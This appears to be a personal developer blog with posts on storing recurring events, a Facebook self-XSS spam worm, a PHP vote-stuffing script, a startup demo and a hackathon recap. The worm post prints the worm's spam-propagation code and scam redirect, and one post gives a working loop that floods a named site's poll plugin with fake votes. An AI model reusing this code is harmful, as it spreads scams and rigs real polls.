
Storing recurring events in a database

One problem that seems to affect many web developers (and desktop programmers as well) is how to store recurring events in a database. There are several ways to do this, all with varying degrees of complexity (both when inserting and when selecting), storage requirements, and constraints on the kinds of recurrence they can express. These can all be found by googling, and most are language agnostic in their implementations. In my case, I needed to store events that could have a very complex set of recurrence requirements. Some examples:

  • Weekly on Thursday and Friday forever
  • Once a month on Friday for 6 months
  • Every other Friday
  • Every third Friday of the month

It also needed to handle exceptions and extensions to existing recurring events, and the events could not be purely virtual instances, since other objects would reference event id numbers as a way of collating collected data. After all this, a set of three tables seems appropriate, with Event, EventModel, and EventException objects. Each Event is an instantiated version of an EventModel, and once instantiated it will remain in the database forever. While this is not best practice, negative infinity in our case is relatively manageable for now. In the future, implicit grouping of data according to an index-less key may be used. EventModel, which contains all the attributes of a single event plus metadata relating to recurrence, acts as a prototype event for recurring events. To normalize the data a bit, even non-recurring events will be stored as EventModels; this will aid in data manipulation later. The EventException object belongs to a third table, which stores individual event exceptions.

In practice, a daily cron script will create events for that day based upon the rules in EventModels.

When viewing events, the easiest way is to view EventModels, with sub-grouping of recent and upcoming events associated with that EventModel.
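As an added illustration (not the post's own schema or code), here is one way to encode the four example rules on an EventModel and run the daily cron step against EventException rows in Python; the field names, the "skip"/"extra" exception kinds and the stable (model_id, day) key are my assumptions.

```python
from dataclasses import dataclass
from datetime import date, timedelta
from typing import FrozenSet, Optional

# Added illustration, not the post's own schema: one way to encode the recurrence
# rules from the post on an EventModel and to run the daily cron step that
# materializes Event rows, honouring EventException rows and never duplicating
# an Event that already exists (ids are referenced elsewhere, so they must be stable).

@dataclass(frozen=True)
class EventModel:
    model_id: int
    title: str
    start: date                         # first day an occurrence may fall on
    weekdays: FrozenSet[int]            # 0=Mon .. 6=Sun
    interval_weeks: int = 1             # 2 = "every other"
    nth_in_month: Optional[int] = None  # 3 = "every third <weekday> of the month"
    end: Optional[date] = None          # None = forever

@dataclass(frozen=True)
class EventException:
    model_id: int
    day: date
    kind: str  # "skip" cancels the generated occurrence, "extra" adds one

def occurs_on(m: EventModel, day: date) -> bool:
    """Does the model's rule produce an occurrence on `day`?"""
    if day < m.start or (m.end is not None and day > m.end):
        return False
    if day.weekday() not in m.weekdays:
        return False
    if m.nth_in_month is not None:
        # Day-of-month 1..7 is the 1st occurrence of that weekday, 8..14 the 2nd, ...
        return (day.day - 1) // 7 + 1 == m.nth_in_month
    # Count whole weeks from the Monday of the start week, then apply the interval.
    start_week = m.start - timedelta(days=m.start.weekday())
    return ((day - start_week).days // 7) % m.interval_weeks == 0

def daily_cron(models, exceptions, existing, day):
    """Return the (model_id, day) pairs the cron job should insert as Event rows
    for `day`; `existing` is the set of pairs already in the Event table."""
    skip = {e.model_id for e in exceptions if e.day == day and e.kind == "skip"}
    extra = {e.model_id for e in exceptions if e.day == day and e.kind == "extra"}
    wanted = ({m.model_id for m in models if occurs_on(m, day)} - skip) | extra
    return sorted((mid, day) for mid in wanted if (mid, day) not in existing)
```

Because `daily_cron` subtracts what is already stored, re-running the cron job for the same day inserts nothing, which is what keeps the event ids other tables point at stable.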


Of course, I’m not an actual programmer or computer scientist, so suggestions are welcome.

Facebook XSS Hacks

Everyone remembers that back when you had AOL Instant Messenger, a major threat was getting a virus. Once a friend got one, it would send itself as a chat message to all of their friends, propagating across the network.

Now, there seems to be a similar menace facing Facebook, especially its chat feature. I recently received a message from a friend on Facebook with the text: “Sam See who views your profile @ x.co/WkdW?95031”. Upon visiting my newsfeed, I noticed a new event invitation to “How to see who viewed your profile!!” by the same person. Interested to see how this was spreading, I visited the link provided (in a secure browser of course). Looking at the site, apparently you are supposed to paste a JavaScript file into your address bar, which executes and tells you who views your profile. While this is of course impossible, it was interesting to see what exactly was going on. Opening the JavaScript file, I discovered a bunch of code I can’t claim to understand. However, some of it was fairly simple, and I shall attempt to explain it.

var randomnumber=Math.floor(Math.random()*99999);
var chatmessage = '%firstname% See who views your profile @ x.co/WkdW?'+randomnumber;
var postmessage = 'My Top Profile Viewers: \n\ %tf% - 1136 views \n\ %tf% - 983 views \n\ %tf% - 542 views \n\ %tf% - 300 views \n\ See who views your profile @ http://x.co/WkdW?'+randomnumber;
var redirect = 'http://aafv8vni.info/final.php';
var eventdesc = 'Hey everyone, \n\ fb now lets you see who viewed your profile! to enable this feature, go here! - http://x.co/WkdW?'+randomnumber;
var eventname = 'How to see who viewed your profile!!';

This first part was very simple. Apparently it just creates a random link and spreads it three ways: chat messages, wall posts, and events. The event creation is something I haven’t seen before and was kind of interesting. Also, for those interested, the values provided are hard-coded into the script, which means they are completely fake. This was assumed, but it’s nice to know for sure. I’m not sure what the random number is for; maybe the author is doing some cool social network analysis on people who click on links like this. The redirect goes to a page that links to several surveys that allow them to “verify your identity.” These are probably just more ways to spam you and make money.

The rest of the code is very obfuscated due to variable and function naming.  Some parts to note are that the author left debug functions intact and uses unique URL identifiers for each instance.  I’m not sure if this is for tracking purposes, but it could open some cool doors for network mapping of gullible people.  The funny thing is that it doesn’t actually harm your computer (that I know of), and only tries to spread itself.  This could just be the beginning of something bigger, but for right now the worst part is the embarrassment and cleanup of your Facebook profile.  The code itself is not very intriguing, since XSS is a commonly known information security vulnerability affecting many sites on the internet.  However, since the script relies on a victim actually pasting code into the URL bar once they are on Facebook, this scam is easy to avoid.

Full Code

Why you shouldn’t use vulnerable software

Because this might happen.
And then this.

<?php
while(1){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://34st.com/wp-content/plugins/wp-polls/wp-polls.php");
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$id=rand(11,13);
curl_setopt($ch, CURLOPT_POSTFIELDS,"vote=true&poll_id=3&poll_3=$id");
curl_exec($ch);
curl_close($ch);
header('Location: http://getmeep.com/curl.php?loop=true');
}
?>
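That loop leaves an obvious trace in the web server's access log: a burst of POSTs to the same plugin path from one address. As an added detection example (not code from the post), this flags such bursts in Apache combined-format log lines; the sample lines, the addresses and the 5-in-60-seconds threshold are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Added detection example, not code from the post. Parses Apache combined-format
# access-log lines and flags source IPs that POST to the wp-polls endpoint more
# than `threshold` times inside any `window`-long span, which is the footprint
# the curl loop above leaves behind. The log lines below are constructed.
_LINE = ('{ip} - - [12/Oct/2011:20:15:{sec:02d} -0400] "POST '
         '/wp-content/plugins/wp-polls/wp-polls.php HTTP/1.1" 200 12 "-" "{ua}"')
SAMPLE_LOG = [_LINE.format(ip="10.0.0.7", sec=s, ua="curl/7.21.0") for s in range(0, 60, 10)]
SAMPLE_LOG += [
    _LINE.format(ip="10.0.0.8", sec=5, ua="Mozilla/5.0"),  # one legitimate vote
    '10.0.0.9 - - [12/Oct/2011:20:15:30 -0400] "GET /wp-polls.php HTTP/1.1" 200 5 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

def parse(line):
    """Return a dict with ip, ts (aware datetime), method, path, status, ua; None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def flag_vote_floods(lines, path_suffix="/wp-polls/wp-polls.php",
                     threshold=5, window=timedelta(seconds=60)):
    """Map each offending IP to its total number of poll POSTs."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec and rec["method"] == "POST" and rec["path"].endswith(path_suffix):
            posts[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, times in posts.items():
        times.sort()
        start = 0
        for end in range(len(times)):          # sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 > threshold:
                flagged[ip] = len(times)
                break
    return flagged
```

Feed it real log lines with `flag_vote_floods(open("access.log"))`; anything it flags is a candidate for rate limiting at the web server or for a plugin update.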

MEEPME at Blarney

Aside from some technical glitches and miscommunication, tonight went pretty well for MEEPME.  Almost a hundred people signed up, and everyone seemed to have a fun time playing around with it.  We got to demo our new AJAXified text feed, and other than a screensaver problem and a video cable problem, it worked great all night.  We could even update the page in real time since the AJAX reloaded the contents every .5 seconds.  I have no idea how much load this was actually putting on the server, but hopefully this should hold together until the next major revision.  The first priority is now to finish the admin backend.

PennApps in Summary

Wow, what a trip.  When Matt contacted me a week before the competition to ask if I had a team yet, I had no idea we would get this far.

Timeline

  • Thursday, before competition – Meet up with Matt, go over idea, get introduced to Twilio API
  • Friday, 6pm – Watch intros, get theme, meet the team (Fred and Vincent), then leave to go DJ
  • Saturday, 10am – arrive to start coding, hungover.
  • Saturday, 1pm – basic ideas and framework fleshed out
  • Saturday, 10pm – so many bugs!
  • Saturday, midnight – start website component
  • Sunday, 4am – mostly done, still fixing bugs
  • Sunday, 10am – nap on hammock
  • Sunday, noon – demo to judges individually
  • Sunday, 2pm – demo for 2.5 minutes in front of audience
  • Sunday, 4pm – MEEPME announced as Grand Prize winner!
  • Monday, 4pm – start social media blitz for Student Choice Award
  • Following Monday, 12:15am – MEEPME wins Student Choice Award!

Next stop: Wharton Business Plan Competition and Philly Startup Weekend!

Media

httpv://www.youtube.com/watch?v=nnyaOXn_HY4
httpv://www.youtube.com/watch?v=W4DGTf0fvRQ